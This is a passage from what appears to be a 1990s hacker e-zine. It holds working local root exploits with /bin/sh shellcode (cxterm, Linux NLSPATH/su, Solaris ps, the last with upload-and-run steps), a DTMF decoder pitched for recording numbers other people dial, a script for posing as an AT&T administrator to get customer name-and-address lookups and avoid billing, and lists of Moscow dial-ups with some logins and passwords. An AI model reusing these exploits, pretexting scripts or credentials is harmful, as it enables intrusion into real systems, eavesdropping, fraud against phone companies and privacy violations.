  797. #define DEFAULT_OFFSET 50
  798.  
  799. #define NOP_SIZE 1
  800. char nop[] = "\x90";
  801. char shellcode[] =
  802.   "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
  803.   "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
  804.   "\x80\xe8\xdc\xff\xff\xff/bin/sh";
  805.  
  806. unsigned long get_sp(void) {
  807.    __asm__("movl %esp,%eax");
  808. }
  809.  
  810. void main(int argc,char **argv)
  811. {
  812.    char *buff = NULL;
  813.    unsigned long *addr_ptr = NULL;
  814.    char *ptr = NULL;
  815.    int i,OffSet = DEFAULT_OFFSET;
  816.  
  817. /* use a different offset if you find this program doesn't do the job */
  818.    if (argc>1) OffSet = atoi(argv[1]);
  819.  
  820.    buff = malloc(2048);
  821.    if(!buff)
  822.    {
  823.       printf("Buy more RAM!\n");
  824.       exit(0);
  825.    }
  826.    ptr = buff;
  827.  
  828.    for (i = 0; i <= BUFFER_SIZE - strlen(shellcode) - NOP_SIZE;
  829. i+=NOP_SIZE) {
  830.         memcpy (ptr,nop,NOP_SIZE);
  831.         ptr+=NOP_SIZE;
  832.    }
  833.  
  834.    for(i=0;i < strlen(shellcode);i++)
  835.       *(ptr++) = shellcode[i];
  836.  
  837.    addr_ptr = (long *)ptr;
  838.    for(i=0;i < (8/4);i++)
  839.       *(addr_ptr++) = get_sp() + OffSet;
  840.    ptr = (char *)addr_ptr;
  841.    *ptr = 0;
  842.    (void) fprintf(stderr,
  843.          "This bug is discovered by Ming Zhang
  844. (mzhang@softcom.net)\n");
  845.     /* Don't need to set ur DISPLAY to exploit this one, cool huh? */
  846.     execl(CXTERM_PATH, "cxterm", "-xrm",buff, NULL);
  847. }
  848.  
  849. ───────────────────────────────────────────────────────────────────────────────
  850.   7. Linux nlspath exploit : Solar Designer
  851. ───────────────────────────────────────────────────────────────────────────────
  852.  
  853. /*
  854.  * NLSPATH buffer overflow exploit for Linux, tested on Slackware 3.1
  855.  * by Solar Designer, 1997.
  856.  */
  857.  
  858. #include <stdio.h>
  859. #include <stdlib.h>
  860. #include <unistd.h>
  861.  
  862. char *shellcode =
  863.   "\x31\xc0\xb0\x31\xcd\x80\x93\x31\xc0\xb0\x17\xcd\x80\x68\x59\x58\xff\xe1"
  864.   "\xff\xd4\x31\xc0\x99\x89\xcf\xb0\x2e\x40\xae\x75\xfd\x89\x39\x89\x51\x04"
  865.   "\x89\xfb\x40\xae\x75\xfd\x88\x57\xff\xb0\x0b\xcd\x80\x31\xc0\x40\x31\xdb"
  866.   "\xcd\x80/"
  867.   "/bin/sh"
  868.   "0";
  869.  
  870. char *get_sp() {
  871.    asm("movl %esp,%eax");
  872. }
  873.  
  874. #define bufsize 2048
  875. char buffer[bufsize];
  876.  
  877. main() {
  878.   int i;
  879.  
  880.   for (i = 0; i < bufsize - 4; i += 4)
  881.     *(char **)&buffer[i] = get_sp() - 3072;
  882.  
  883.   memset(buffer, 0x90, 512);
  884.   memcpy(&buffer[512], shellcode, strlen(shellcode));
  885.  
  886.   buffer[bufsize - 1] = 0;
  887.  
  888.   setenv("NLSPATH", buffer, 1);
  889.  
  890.   execl("/bin/su", "/bin/su", NULL);
  891. }
  892.  
  893. ───────────────────────────────────────────────────────────────────────────────
  894.   8. Solaris 2.5.1 ps exploit : J. Zbiciak
  895. ───────────────────────────────────────────────────────────────────────────────
  896.  
  897. #!/bin/sh
  898. #
  899. # Exploit for Solaris 2.5.1 /usr/bin/ps
  900. # J. Zbiciak, 5/18/97
  901. #
  902. # Just copy this into one file, upload it to a system, chmod 755 <file> and
  903. # then run it using <file>
  904.  
  905. # change as appropriate
  906. CC=gcc
  907.  
  908. # Build the "replacement message" :-)
  909. cat > ps_expl.po << E_O_F
  910. domain "SUNW_OST_OSCMD"
  911. msgid "usage: %s\n%s\n%s\n%s\n%s\n%s\n%s\n"
  912. msgstr "\055\013\330\232\254\025\241\156\057\013\332\334\256\025\343\150\220\013\200\016\222\003\240\014\224\032\200\012\234\003\240\024\354\073\277\354\300\043\277\364\334\043\277\370\300\043\277\374\202\020\040\073\221\320\040\010\220\033\300\017\202\020\040\001\221\320\040\010"
  913. E_O_F
  914.  
  915. msgfmt -o /tmp/foo ps_expl.po
  916.  
  917. # Build the C portion of the exploit
  918. cat > ps_expl.c << E_O_F
  919.  
  920. /*****************************************/
  921. /* Exploit for Solaris 2.5.1 /usr/bin/ps */
  922. /* J. Zbiciak,  5/18/97                  */
  923. /*****************************************/
  924. #include <stdio.h>
  925. #include <stdlib.h>
  926. #include <sys/types.h>
  927. #include <unistd.h>
  928.  
  929. #define BUF_LENGTH      (632)
  930. #define EXTRA           (256)
  931.  
  932. int main(int argc, char *argv[])
  933. {
  934.         char buf[BUF_LENGTH + EXTRA];
  935.                       /* ps will grok this file for the exploit code */
  936.         char *envp[]={"NLSPATH=/tmp/foo",0};
  937.         u_long *long_p;
  938.         u_char *char_p;
  939.                         /* This will vary depending on your libc */
  940.         u_long proc_link=0xef70ef70;
  941.         int i;
  942.  
  943.         long_p = (u_long *) buf;
  944.  
  945.         /* This first loop smashes the target buffer for optargs */
  946.         for (i = 0; i < (96) / sizeof(u_long); i++)
  947.                 *long_p++ = 0x10101010;
  948.  
  949.         /* At offset 96 is the environ ptr -- be careful not to mess it up */
  950.         *long_p++=0xeffffcb0;
  951.         *long_p++=0xffffffff;
  952.  
  953.         /* After that is the _ctype table.  Filling with 0x10101010 marks the
  954.            entire character set as being "uppercase printable". */
  955.         for (i = 0; i < (BUF_LENGTH-104) / sizeof(u_long); i++)
  956.                 *long_p++ = 0x10101010;
  957.  
  958.         /* build up _iob[0]  (Ref: /usr/include/stdio.h, struct FILE) */
  959.         *long_p++ = 0xFFFFFFFF;   /* num chars in buffer */
  960.         *long_p++ = proc_link;    /* pointer to chars in buffer */
  961.         *long_p++ = proc_link;    /* pointer to buffer */
  962.         *long_p++ = 0x0501FFFF;   /* unbuffered output on stream 1 */
  963.         /* Note: "stdin" is marked as an output stream.  Don't sweat it. :-) */
  964.  
  965.         /* build up _iob[1] */
  966.         *long_p++ = 0xFFFFFFFF;   /* num chars in buffer */
  967.         *long_p++ = proc_link;    /* pointer to chars in buffer */
  968.         *long_p++ = proc_link;    /* pointer to buffer */
  969.         *long_p++ = 0x4201FFFF;   /* line-buffered output on stream 1 */
  970.  
  971.         /* build up _iob[2] */
  972.         *long_p++ = 0xFFFFFFFF;   /* num chars in buffer */
  973.         *long_p++ = proc_link;    /* pointer to chars in buffer */
  974.         *long_p++ = proc_link;    /* pointer to buffer */
  975.         *long_p++ = 0x4202FFFF;   /* line-buffered output on stream 2 */
  976.  
  977.         *long_p =0;
  978.  
  979.         /* The following includes the invalid argument '-z' to force the
  980.            usage msg to appear after the arguments have been parsed. */
  981.         execle("/usr/bin/ps", "ps", "-z", "-u", buf, (char *) 0, envp);
  982.         perror("execle failed");
  983.  
  984.         return 0;
  985. }
  986. E_O_F
  987.  
  988. # Compile it
  989. $CC -o ps_expl ps_expl.c
  990.  
  991. # And off we go!
  992. exec ./ps_expl
  993.  
  994. ───────────────────────────────────────────────────────────────────────────────
  995.   9. 0wned.c : so1o
  996. ───────────────────────────────────────────────────────────────────────────────
  997.  
  998. /*       THIS IS FUCKING PRIVATE SHIT, DONT DISTRIBUTE IT!@#        */
  999. /* I CODED THIS QUICKLY ONE NIGHT, IT WILL ROOT ANY LINUX 2.0.x BOX */
  1000. /*               -D-O- -N-O-T- -D-I-S-T-R-I-B-U-T-E-                */
  1001. /*                      so1o@insecurity.org                         */
  1002.  
  1003. main()
  1004.  
  1005. {
  1006.         char a1='j',a2='0',a3='a',a4='r',a5='3';
  1007.         char b1='w',b2='n',b3='d';
  1008.         printf("%c%c%c %c%c%c\n",a1,a2,a2,a3,a4,a5);
  1009.         printf("%c %c %c %c %c\n\n",a2,b1,b2,a5,b3);
  1010.         printf("By so1o@insecurity.org 1997\n");
  1011. }
  1012.  
  1013. ───────────────────────────────────────────────────────────────────────────────
  1014. ===============================================================================
  1015. ==[ FONES / SCANNING ]=========[ .SECTION C. ]===========[ FONES / SCANNING ]==
  1016. ===============================================================================
  1017. ───────────────────────────────────────────────────────────────────────────────
  1018.   1. DTMF Decoder : xFli
  1019. ───────────────────────────────────────────────────────────────────────────────
  1020.  
  1021. DTMF Decoder plans.
  1022. -------------------
  1023.  
  1024. If you are into bigtime surveillance, or you just have some burning desire 
  1025. to get the phone number of your sisters sexy friend, then you will be 
  1026. interested in this little circuit. Basically, using this, you can use a tape
  1027. recorder and a pickup coil to record the DTMF tones sent when someone dials
  1028. a number, or if it is easier to you can wire it up to a phone jack and
  1029. decode in realtime, and then decode them to get the number dialled. This 
  1030. can cope with speed dialling, but you will need a reasonably good recording
  1031. to decode successfully. 
  1032.  
  1033. The circuit is simplicity itself, literally only 5 components. I could have
  1034. included an unreadable ascii circuit diag / pcb layout, but it would  have been
  1035. a waste of time, so the diags are available from http://www.codez.com and other
  1036. CodeZero sites.
  1037.  
  1038. The hardware takes the DTMF signal, decodes it and sends it to lpt1, where the
  1039. binary output of the ic is converted into standard numbers. The simple BASIC
  1040. program is included. Which is precompiled on http://www.codez.com
  1041.  
  1042. Component list:
  1043. ----------------
  1044.  
  1045. 1 x SSI202 18 pin Chip
  1046. 1 x 3.579 MHz quartz crystal
  1047. 2 x 27n Capacitors
  1048. 1 x 1M resistor 
  1049.  
  1050. Source:
  1051. --------
  1052.  
  1053. DTMF DECODER SOFTWARE
  1054. ------------------------------------------
  1055.  
  1056. ' Use this to decode the output from the decoder hardware
  1057. ' Not written by xFli, suggested in an electronics mag.
  1058.  
  1059. 10 CLS:KEY OFF
  1060. 20 I=INP(&H279) 
  1061. 30 IF (I AND 128)=128 THEN 30
  1062. 40 C=0
  1063. 50 IF (I AND 8)=8 THEN C=C+1
  1064. 60 IF (I AND 16)=16 THEN C=C+2
  1065. 70 IF (I AND 32)=32 THEN C=C+4
  1066. 80 IF (I AND 64)=64 THEN C=C+8
  1067. 90 IF C=11 THEN PRINT" * ";:GOTO 180
  1068. 100 IF C=12 THEN PRINT" # ";:GOTO 180
  1069. 110 IF C=13 THEN PRINT" A ";:GOTO 180
  1070. 120 IF C=14 THEN PRINT" B ";:GOTO 180
  1071. 130 IF C=15 THEN PRINT" C ";:GOTO 180
  1072. 140 IF C=0 THEN PRINT" D ";:GOTO 180
  1073. 150 IF C=10 THEN PRINT" 0 ";:GOTO 180
  1074. 160 PRINT C;
  1075. 170 I=INP(&H279) 
  1076. 180 IF (I AND 128)=0 THEN 180
  1077. 190 T=TIMER
  1078. 200 I=INP(&H279)
  1079. 210 IF (TIMER-T)>5 THEN PRINT:PRINT:GOTO 30
  1080. 220 IF (I AND 128) = 128 THEN 210
  1081. 230 GOTO 50
  1082.  
  1083. In the magazine, it is advised you use gw-basic, which is included with very
  1084. very early DOS versions. It may or may not work with qbasic etc. I don't know.
  1085. These are also for UK tones, maybe they are different in the US.
  1086.  
  1087. ───────────────────────────────────────────────────────────────────────────────
  1088.   2. Dealing With Directory Assistance Operators : Qytpo
  1089. ───────────────────────────────────────────────────────────────────────────────
  1090.  
  1091. Alright, this information should be made available to everyone who cares
  1092. to read it. Any information used from this article is to be used at a
  1093. persons own risk. i will not be held responsible if any of this is used
  1094. for wrongfull purposes- ( it can, you just have to get really creative ).
  1095.  
  1096. Well, to start off, the job of the directory assistance operator, is to
  1097. give out addresses, phone numbers, and area codes, for the information
  1098. given to them. The operators can search from names, business names, and
  1099. government names, despite what anyone tells you, an AT&T DIRECTORY
  1100. ASSISTANCE OPERATOR CAN DO A CNA SEARCH. (Customer name and address)
  1101. If the particular operator says they cant, then bug them. yell at them. 
  1102. if they dont do it themselves, they will get their supervisor. and if you
  1103. make it sound really important they can do it. and if all that doesnt
  1104. work, try to find a naive operator, tell them you are an AT&T
  1105. administrator, and say, to press (Control+C) to bring up a CNA search on
  1106. their switch. A CNA search is a very valuable asset, if you cannot find a
  1107. CNA operator, give a directory assistance operator a whirl, chances are,
  1108. if you have a brain, and are a decent actor, you can get the listing for
  1109. the number you give them.
  1110.  
  1111. Routing.
  1112.  
  1113. The calls are routed through a large mainframe in each state department
  1114. How it works: Say you dial, 602-555-1212. that would put you through to an
  1115. operator ANYWHERE in the United States, where phoenix calls are routed
  1116. through to. it will not just appear in 602, allthought that is where it is
  1117. supposed to. If the switches in 602 are full, the call could end up
  1118. anywhere in the US. 
  1119.  
  1120. When the operator picks up the reciever- (it is actually a headset that
  1121. beeps). The call is automatically traced to whatever area code they
  1122. dialed. so if You dialed (602 555 1212). an operator anywhere in the US,
  1123. would get a listing on their screen, and a default city, in the upper left
  1124. hand corner [PHOE] (phoenix arizona). [ *note*: depending on the area
  1125. code, 602 for example, the operator can search the area codes permitted in
  1126. that area code..] 
  1127.  
  1128. for example, if you dialed 602-555-1212, the operator would be allowed to
  1129. search in 502 (the other area code in AZ) However, in some area codes,
  1130. they will make you redial, like LA, or TEXAS, or NEWYORK;
  1131. they have so many area codes, For example 310 and 210, in LOS ANGELES 
  1132. If you wanted a listing for LOS ANGELES, and dialed 210-555-1212, 
  1133. and wanted a listing for city in los angeles which was 310, they would
  1134. make you hang up and dial 310-555-1212. (the operator
  1135. shuld be saying to himself/herself, "no, this kiddie needz to call 310
  1136. instead, or i get fired for giving out bad information"...if they have a
  1137. clue)
  1138.  
  1139. Sample Call to a D A O for a CNA Search: ( The best way to get info )
  1140.  
  1141. ( caller dials 555-1212 in area code )
  1142.  
  1143. <Operator  > City please?
  1144. <Caller    > Yes, this is James Thornton at AT&T the AT&T administrative
  1145.              assistance office. I need you to do a CNA Search for me.
  1146. <Operator  > I'm sorry sir, we're not permitted to do CNA searches.
  1147. <Caller    > Yes, I know. May I speak to a supervisor?
  1148. <Supervisor> This is So and So supervisor, how can I help you sir?
  1149. <Caller    > Yes, this is James Thornton down at the AT&T (also called Excel)
  1150.              office in Florida, we need a CNA search done for a XXX-XXX-XXXX.
  1151. <Supervisor> One moment please.
  1152. <Caller    > Ok.
  1153. <Supervisor> Ok, I am (or am not) showing a listing for XXX-XXX-XXXX,
  1154.              would you like that listing sir?
  1155. <Caller    > Yes please, and I would like that verbally. (if you time it just
  1156.              right, you can get the info for free. if yer beige boxing, it
  1157.              doesnt really make a difference tho.) - hang up, say "what" a few
  1158.              times, to make it sound like you didnt get the listing. and hang up
  1159.              before she finishes the second time. she can only bill you while
  1160.              you are on the line, and if she fucks up, you can get away with it
  1161.              with no bill while they read you the number. This method only
  1162.              works for a verbal listing. if yer quick enough. ;)
  1163.  
  1164.              - - -   The NPA RULES.  - - -
  1165.  
  1166. NPA dialed  :  NPAS PERMITTED TO SEARCH IN FROM THE NPA DIALLED
  1167.  
  1168.    -----California----
  1169.    213             213
  1170.    209             408 510 707 916
  1171.    408             209 510
  1172.    415             510 707 
  1173.    510             209 408 415 707 916 
  1174.    707             209 415 510 916
  1175.    714             714
  1176.    916             209 510 707
  1177.  
  1178.    -------Texas-------
  1179.    210             512 915 
  1180.    214             817 903 972
  1181.    281             409 713
  1182.    409             281 512 713 817 903
  1183.    512             210 409 817 915
  1184.    713             281 409
  1185.    806             817 915
  1186.    817             214 409 512 806 903
  1187.    903             214 409 817
  1188.    915             210 512 806 817
  1189.    972             214 817 903
  1190.  
  1191.  
  1192.    -----New York------
  1193.    212             718 914 917
  1194.    315             518 607 716
  1195.    516             718
  1196.    518             315 607 914
  1197.    607             315 518 716 914
  1198.    716             315 607
  1199.    718             212 518 914
  1200.    914             212 518 607 718
  1201.    917 (cell)      212 718 914
  1202.  
  1203.    *note*: all other states can search all NPA's listed in that state.
  1204.  
  1205. - Qytpo (@#hackers on EFnet)
  1206.  
  1207. ───────────────────────────────────────────────────────────────────────────────
  1208.   3. Russian fone #'s (+7 095 XXXxxxx) : CyberLirik
  1209. ───────────────────────────────────────────────────────────────────────────────
  1210.  
  1211.               Some Interesting ph0ne #'s [04.07.97]
  1212.                       [RUSSiA] +7 095 XXXxxxx
  1213.      written by CyberLirik (lirik@hotmail.com) [www.sqrt.com]
  1214.  
  1215.    ----------------------------------------------------------------
  1216.                   AT&T Calling Cards  Service
  1217.    ----------------------------------------------------------------
  1218.  
  1219.     9740074    Tone System - AT&T  Moscow HQ
  1220.                switch to tone mode
  1221.                press 0 to page operator
  1222.                then by pressing  "1" ya can record your voice message
  1223.                then by pressing "2" & "3"  ya can hear your record :)
  1224.  
  1225.     7555042    English-speeking AT&T operator
  1226.     1555042    Also Automate AT&T Calling System is here ( tone )
  1227.  
  1228.     7555555    Russian-speeking AT&T operator
  1229.     1555555    No  AT&T  Tone  Machine !
  1230.  
  1231.    ----------------------------------------------------------------
  1232.              Sprintnet Local  Dial-Ups 02501 & 03110 DNICs
  1233.                   GlobalOne = Sprintnet = Telenet
  1234.    ----------------------------------------------------------------
  1235.  
  1236.     9286344   9600
  1237.     9280985   9600
  1238.     9137166   9600  < Only for MAIL
  1239.     5789119   2400
  1240.     3428376   9600 real connect 2400
  1241.     9167373   SprintNet V34-19200
  1242.     9167272   ???
  1243.     9167171   ?
  1244.  
  1245.     00wait8   RoSprint PPP dialup.
  1246.  
  1247.    ----------------------------------------------------------------
  1248.                    ROSPAC Local Dial-Ups  02500 DNIC
  1249.    ----------------------------------------------------------------
  1250.  
  1251.     9270003   9600
  1252.     9563692   9600
  1253.     9563690
  1254.  
  1255.    ----------------------------------------------------------------
  1256.                    RosNet  Dialups  02506 DNIC
  1257.    ----------------------------------------------------------------
  1258.  
  1259.     975-8403
  1260.     913-3571
  1261.     921-2103
  1262.     201-2030    Voice:(095)206-8570,206-8458,206-7238
  1263.     442-6422
  1264.     442-8277
  1265.     442-7022
  1266.     442-8388
  1267.     442-7088
  1268.     442-8577
  1269.     442-8077
  1270.     442-6477
  1271.     20-906,33-571  Iskra-2
  1272.  
  1273.    ----------------------------------------------------------------
  1274.              IBM GLOBAL network Dial-Up (aka old Advantis Network)
  1275.    ----------------------------------------------------------------
  1276.  
  1277.      2586420
  1278.  
  1279.    ----------------------------------------------------------------
  1280.                Russia@Online Dial-Ups  28.8Kbps
  1281.    ----------------------------------------------------------------
  1282.  
  1283.     9132376   30 lines
  1284.     2584120   60 lines
  1285.     3619999
  1286.     2584161   Voice phone !
  1287.  
  1288.    ----------------------------------------------------------------
  1289.                 InfoNet Euro
  1290.    ----------------------------------------------------------------
  1291.  
  1292.     9150001   28.8
  1293.     9150005   28.8
  1294.       2400 temp [unpublished]
  1295.       2400 temp [unpublished]
  1296.       2400 temp [unpublished]
  1297.       2400 temp [unpublished]
  1298.  
  1299.     2927056   Infonet Euro Voice !
  1300.  
  1301.    ----------------------------------------------------------------
  1302.          Sita Network (AOLGLOBALnet & SCITOR {aka EQUANT} )
  1303.    ----------------------------------------------------------------
  1304.  
  1305.     9563589   14400
  1306.     9676767
  1307.     9676730-9676769
  1308.     9676767
  1309.     9676784
  1310.  
  1311.     9562455   SITA voice! phones
  1312.     9564736
  1313.  
  1314.    ----------------------------------------------------------------
  1315.                          BT-Tymnet
  1316.    ----------------------------------------------------------------
  1317.  
  1318.     956-0699     9600  Real Tymnet      Voice 9563678
  1319.     503/9563691  TYM-X25 Sync
  1320.  
  1321.    ----------------------------------------------------------------
  1322.                  CentroNet DialUp  www.astro.ru
  1323.    ----------------------------------------------------------------
  1324.  
  1325.     7511704  14400
  1326.  
  1327.    ----------------------------------------------------------------
  1328.                Infotel dialUps  [02504]
  1329.    ----------------------------------------------------------------
  1330.  
  1331.     9585475
  1332.     9580226
  1333.     9580825
  1334.     9580575
  1335.  
  1336.    ----------------------------------------------------------------
  1337.                MMTEL DialUPs    [02503]  address on login:.db
  1338.    ----------------------------------------------------------------
  1339.  
  1340.     3371001    5 lines
  1341.     2419860
  1342.     2418340
  1343.     2461661
  1344.  
  1345.    ----------------------------------------------------------------
  1346.              www.Cityline.ru V34
  1347.    ----------------------------------------------------------------
  1348.  
  1349.     2587884     40 lines
  1350.     9567759     20
  1351.     2341901     10
  1352.     2450070     10
  1353.     2454414     10
  1354.  
  1355.    ----------------------------------------------------------------
  1356.       http://www.telekom.ru                   Elvis+
  1357.     Proxy 194.190.195.71. DNS 195.190.195.66.  temp  192.168.12.1
  1358.     SLIP login: iptest PPP login: pptest Password: guest
  1359.    ----------------------------------------------------------------
  1360.  
  1361.     974-51-22 (24 ½¿¡¿¿)
  1362.     961-51-22 (24 ½¿¡¿¿)
  1363.     230-61-84 (5 ½¿¡¿⌐)
  1364.     152-53-44 152-97-47 152-94-09
  1365.     152-31-72 152-93-32
  1366.     152-53-29 152-93-33
  1367.     152-41-09 152-53-38
  1368.     258-96-31 (30 ½¿¡¿⌐) 247-66-22 (30 ½¿¡¿⌐)
  1369.     532-82-47 çѽѡ«úαáñ߬¿⌐ πºÑ½
  1370.     532-81-98 532-81-29
  1371.  
  1372.    ----------------------------------------------------------------
  1373.                       www.dataforce.net
  1374.    ----------------------------------------------------------------
  1375.  
  1376.     9566749        voice 2889340
  1377.     2340591        (16 ½¿¡¿⌐)
  1378.  
  1379.    ----------------------------------------------------------------
  1380.                   PTT-Teleport  www.ptt.ru
  1381.    ----------------------------------------------------------------
  1382.  
  1383.     946-9383 voice about x.25,28,etc
  1384.     946-9393 modem PPP
  1385.  
  1386.    ----------------------------------------------------------------
  1387.             Demos 33.8 V34 HST
  1388.    ----------------------------------------------------------------
  1389.  
  1390.     958-19-75
  1391.     958-19-81     l:_demo
  1392.     956-62-85     p: demo
  1393.     956-62-86
  1394.     241-05-05
  1395.     961-32-00
  1396.  
  1397.    ----------------------------------------------------------------
  1398.            Dial ups  mailto:_CRUSAIDER2_@MSN.COM
  1399.    ----------------------------------------------------------------
  1400.  
  1401.     281-0201
  1402.     975-0520
  1403.         (37)
  1404.  
  1405.    ----------------------------------------------------------------
  1406.                         INTEL PORT :
  1407.    ----------------------------------------------------------------
  1408.  
  1409.     956-4787 Main
  1410.     434-1565 Registration
  1411.     202-6934 Demo
  1412.  
  1413.    ----------------------------------------------------------------
  1414.          Youth Science Center Linux server  Dmitry Ablov 9540012
  1415.    ----------------------------------------------------------------
  1416.  
  1417.     Data lines:      Line 1:  954-0664 (14400, 24h, UUPC only)
  1418.                           2:  954-0058 (14400, 21:00 - 09:00)
  1419.                           3:  954-0914 ( 9600, 21:00 - 09:00)
  1420.                           4:  954-0147 (33600, 24h, PPP only)
  1421.                           5:  954-0144 (33600, 24h, RAS only)
  1422.                           6:  954-0445 (33600, 24h, restricted)
  1423.  
  1424.    ----------------------------------------------------------------
  1425.                        Comstar Dialup
  1426.    ----------------------------------------------------------------
  1427.  
  1428.     2324626
  1429.     2329696
  1430.  
  1431.    ----------------------------------------------------------------
  1432.                        www.com2com.ru
  1433.    ----------------------------------------------------------------
  1434.  
  1435.     234-7171  PPP check
  1436.     956-0112  PPP check
  1437.  
  1438.    ----------------------------------------------------------------
  1439.                        www.gamma.ru
  1440.    ----------------------------------------------------------------
  1441.  
  1442.     742-04-42 (6 ½¿¡¿⌐ USR Courier 33600)
  1443.     232-68-06 (5 ½¿¡¿⌐ USR Courier 33600)
  1444.     913-39-44 (1 ½¿¡¿∩ USR Courier 33600)
  1445.     939-15-57 (1 ½¿¡¿∩ USR Sportster 28800)
  1446.     939-35-26 (1 ½¿¡¿∩ USR Sportster 28800)
  1447.     939-26-18 (Zyxel 19200)
  1448.     932-88-78 (1 ½¿¡¿∩ GVC 2400)
  1449.     939-18-51 (1 ½¿¡¿∩ GVC 2400)
  1450.  
  1451.    ----------------------------------------------------------------
  1452.                       Mr Postman sunny.aha.ru
  1453.    ----------------------------------------------------------------
  1454.  
  1455.     9566243  42?lines USRobotics Courier V.Everything (33600 V.34+)
  1456.     9560124  JS Comstar
  1457.     2512555  MGTS (Moscow PSTN), Miusskiy node
  1458.     2512591
  1459.     2511030
  1460.  
  1461.    ----------------------------------------------------------------
  1462.                          www.co.ru  Combellga
  1463.    ----------------------------------------------------------------
  1464.  
  1465.     9265020
  1466.     9357120   (óßÑú« 30 óσ«ñ«ó)
  1467.  
  1468.    ----------------------------------------------------------------
  1469.                         www.techno.ru
  1470.    ----------------------------------------------------------------
  1471.  
  1472.     234-33-03 (ßÑα¿∩ 8 Γѽ.)
  1473.     965-09-93
  1474.     965-09-01
  1475.     465-67-07
  1476.     463-25-20
  1477.     461-82-11
  1478.     965-10-19 (28 ½¿¡¿⌐)
  1479.     Online guest 234-35-99
  1480.  
  1481.    ----------------------------------------------------------------
  1482.                         www.redline.ru
  1483.    ----------------------------------------------------------------
  1484.  
  1485.     956-67-56
  1486.     928-84-29 (ßÑα¿∩ 17 ½¿¡¿⌐)
  1487.     200-24-71
  1488.  
  1489.    ----------------------------------------------------------------
  1490.                        www.netclub.ru
  1491.    ----------------------------------------------------------------
  1492.  
  1493.     2476205 (US Robotics 33600)
  1494.     2476204 (Zuxel)
  1495.  
  1496.    ----------------------------------------------------------------
  1497.                         www.space.ru
  1498.    ----------------------------------------------------------------
  1499.  
  1500.     913-50-20
  1501.     747-33-55 (óßÑú« 33 ½¿¡¿¿)
  1502.  
  1503.    ----------------------------------------------------------------
  1504.                         www.relcom.ru
  1505.    ----------------------------------------------------------------
  1506.  
  1507.     946-99-84
  1508.     946-99-94
  1509.     926-50-18
  1510.     947-55-99
  1511.     913-57-47
  1512.     753-07-77
  1513.     742-57-27
  1514.  
  1515.    ----------------------------------------------------------------
  1516.                           www.sitek.ru
  1517.    ----------------------------------------------------------------
  1518.  
  1519.     963-31-01
  1520.     963-21-01
  1521.     963-11-01
  1522.     964-10-01 (60 ½¿¡¿⌐).
  1523.  
  1524.    ----------------------------------------------------------------
  1525.                         www.glasnet.ru
  1526.    ----------------------------------------------------------------
  1527.  
  1528.     928-44-46
  1529.     928-00-53
  1530.     262-02-09
  1531.     262-20-72
  1532.     262-02-27
  1533.     927-41-11
  1534.     975-00-54
  1535.     971-52-01  (óßÑú« í«½ÑÑ 170 ¼«ñѼ¡δσ óσ«ñ«ó).
  1536.  
  1537.    ----------------------------------------------------------------
  1538.                         www.synapse.ru
  1539.    ----------------------------------------------------------------
  1540.  
  1541.     201-25-87
  1542.     203-47-44(Γ)
  1543.     956-47-87(Γ)
  1544.  
  1545.    ----------------------------------------------------------------
  1546.                       web.rosmail.com POCHET
  1547.    ----------------------------------------------------------------
  1548.  
  1549.     924-85-69
  1550.     956-61-02(30 óσ«ñ«ó)
  1551.  
  1552.    ----------------------------------------------------------------
  1553.                        www.park.ru
  1554.    ----------------------------------------------------------------
  1555.  
  1556.     247-62-36
  1557.     É932-91-40
  1558.  
  1559.    ----------------------------------------------------------------
  1560.                       www.rinet.ru
  1561.    ----------------------------------------------------------------
  1562.  
  1563.     9567800
  1564.     9138111 (33600)
  1565.  
  1566.    ----------------------------------------------------------------
  1567.                       www.compnet.ru
  1568.    ----------------------------------------------------------------
  1569.  
  1570.     964-31-01
  1571.     963-20-01
  1572.  
  1573.    ----------------------------------------------------------------
  1574.                       www.corbina.ru
  1575.    ----------------------------------------------------------------
  1576.  
  1577.     7559298    (USR Courier 33600)
  1578.     7851102
  1579.  
  1580.    ----------------------------------------------------------------
  1581.                Misc Voice/t0ne/Carrier services
  1582.    ----------------------------------------------------------------
  1583.  
  1584.     00wait5   STB Card processing center
  1585.     00wait9   free information service
  1586.  
  1587.     9629424     demo user code : 12345 FaxInfo Demo Voice Line
  1588.     9759220     Telephone Voice Bulletin Board
  1589.  
  1590.     7059285     leave me mail in 80718 box
  1591.  
  1592.     9253503     Online registration 4 email
  1593.     9253507     billing for telephone #
  1594.  
  1595.     2587474     Logon:
  1596.     2586435
  1597.     2586411
  1598.     2586414
  1599.       30;32
  1600.     9269199
  1601.     9500885
  1602.     9563686
  1603.     9564787     Interport Mailbox ( t0ne )
  1604.     9560050     Unknown system ( t0ne )
  1605.     9585474     PassWord:
  1606.     7473355     ASVT Dial Up Gateway 2   Users: Oleg & Alex
  1607.  
  1608.     9560885  "The Microsoft Network is no longer
  1609.                             providing MSN in Russia"
  1610.  
  1611.    ----------------------------------------------------------------
  1612.                  _always_ BUSY #s ( unpluged )
  1613.    ----------------------------------------------------------------
  1614.  
  1615.     111-11xx
  1616.     222-2222
  1617.     980xxxxx-999xxxxx
  1618.  
  1619.    ----------------------------------------------------------------
  1620.                     Gate to Iskra2 lines
  1621.    ----------------------------------------------------------------
  1622.  
  1623.     742xxxx  Call for 8-097-2nodes
  1624.     913xxxx  Call for 8-097-3nodes
  1625.  
  1626.    -=-=-=-=-=-=-=-=-=-=-= Free 800 Services  =-=-=-=-=-=-=-=-=-=-=-
  1627.                            ■ Moscow #s
  1628.  
  1629.     7473320 Rus  MCI Operators  in California
  1630.     7473322 Eng  connect me to Customer's Service in Russian
  1631.     7473321 AT&T Operators  in New-York
  1632.     7473323
  1633.     7473324 Sprint Global, Arizona, USA
  1634.     7473325 Orua,Canada
  1635.     7473326 Otele Code ?
  1636.     7473327 National Calling Center, UK
  1637.     7473328
  1638.     7473329 Japan
  1639.     7473356 Sprint Calling Cards
  1640.     7473357
  1641.     7473359  France service
  1642.     7473360
  1643.     7473361  Italian service
  1644.     7473363  Chili ? service
  1645.  
  1646.                         ■ National Russian #s
  1647.  
  1648.     8-10 800 4977211 - æÿÇ( AT&T);
  1649.     8-10 800 4977222 - æÿÇ( MCI);
  1650.     8-10 800 4977255 - æÿÇ( Sprint) ;
  1651.     8-10 800 4977220 - æÿÇ(MCI απß߬«∩ºδτ¡á∩ ß½πªíá);
  1652.     8-10 800 4977233 - èá¡áñá (Teleglob);
  1653.     8-10 800 4977266 - éѽ¿¬«íα¿Γá¡¿∩(BT);
